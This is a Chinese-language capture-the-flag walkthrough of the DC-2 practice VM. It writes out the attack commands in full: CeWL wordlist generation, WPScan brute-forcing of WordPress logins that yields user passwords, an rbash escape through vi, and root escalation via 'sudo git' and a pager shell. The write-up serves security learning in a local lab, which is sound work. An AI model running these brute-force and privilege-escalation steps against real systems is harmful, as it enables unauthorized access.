DC-2 Writeup
- 1DC-1 Writeup
- 2DC-2 Writeup本文
仅供安全学习,环境均为本地虚拟机或 CTF 靶场。请勿用于未授权目标。
介绍
注意到作者强调:
Please note that you will need to set the hosts file on your pentesting device to something like:
192.168.0.145 dc-2
Obviously, replace 192.168.0.145 with the actual IP address of DC-2.
It will make life a whole lot simpler (and a certain CMS may not work without it).
所以我们要先暂时修改 Kali 的 hosts:
echo '192.168.78.143 dc-2' | sudo tee /etc/hosts分析
侦察
nmap 扫描得知:
- OS: Debian
- Kernel: Linux 3.2 - 4.14
- Web Server: Apache httpd 2.4.10
- CMS: WordPress 4.7.10
- 开放端口:tcp 80, 7744 (SSH)
看样子要先从 Web 服务下手。
flag1
注意到这个网站使用的是 WordPress(只要你的视力没有问题):

第一个 flag 就在首页:
Flag
Flag 1:
Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.
More passwords is always better, but sometimes you just can’t win them all.
Log in as one to see the next flag.
If you can’t find it, log in as another.flag2
注意到 flag1 提到了 cewl,也许你不认识这个单词,因为这不是个单词…(这里的 cewl 双关了 “cool”)
CeWLkali 是个自定义字典生成工具:
这里明确说普通的字典不好使,所以要我们用 CeWL 制作一个字典来用。
注意到在这个页面上,我们没有找到任何登录入口。
目录扫描得到:

发现了登录界面:
http://dc-2/wp-login.php
使用 WPScankali 扫描得到三个有效用户:

接下来制作字典,
echo "admintomjerry" > user.txtCeWL 可以根据网站内容制作对应的字典2:
cewl http://dc-2/ -w password.txt通过:
wpscan --url http://dc-2/ --usernames user.txt --passwords password.txt threads 20得到:
tom->parturientjerry->adipiscing
登录后注意到 flag2:

flag3
注意到我们可以用 tom - parturient 通过 7744 端口登录到其服务器:

登录 shell 为 rbash,权限受限。且 $PATH 只有 /home/tom/usr/bin。
查看 /home/tom/usr/bin 得知可以使用:
lesslsscpvi
查看 flag3.txt:
vi flag3.txtPoor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.flag3.txt (END)flag4
根据 flag3,我们需要用 su。
配置别名:
alias c="printf '\e[H\e[2J\e[3J'"alias l='ls --color'alias ll='ls --color -lh'alias la='ls --color -A'alias lla='ls --color -lhA'查看其他用户:
less /etc/passwd
通过 vi 逃逸 rbash3:
vi -c ':set shell=/bin/bash | shell'
flag4 提示我们找 git。
flag5
切换到 jerry 账号:
su - jerry密码为之前的:adipiscing

通过 git 提权到 root:4
sudo git branch --help再通过 less 执行:
!/bin/bash得到最终 flag:


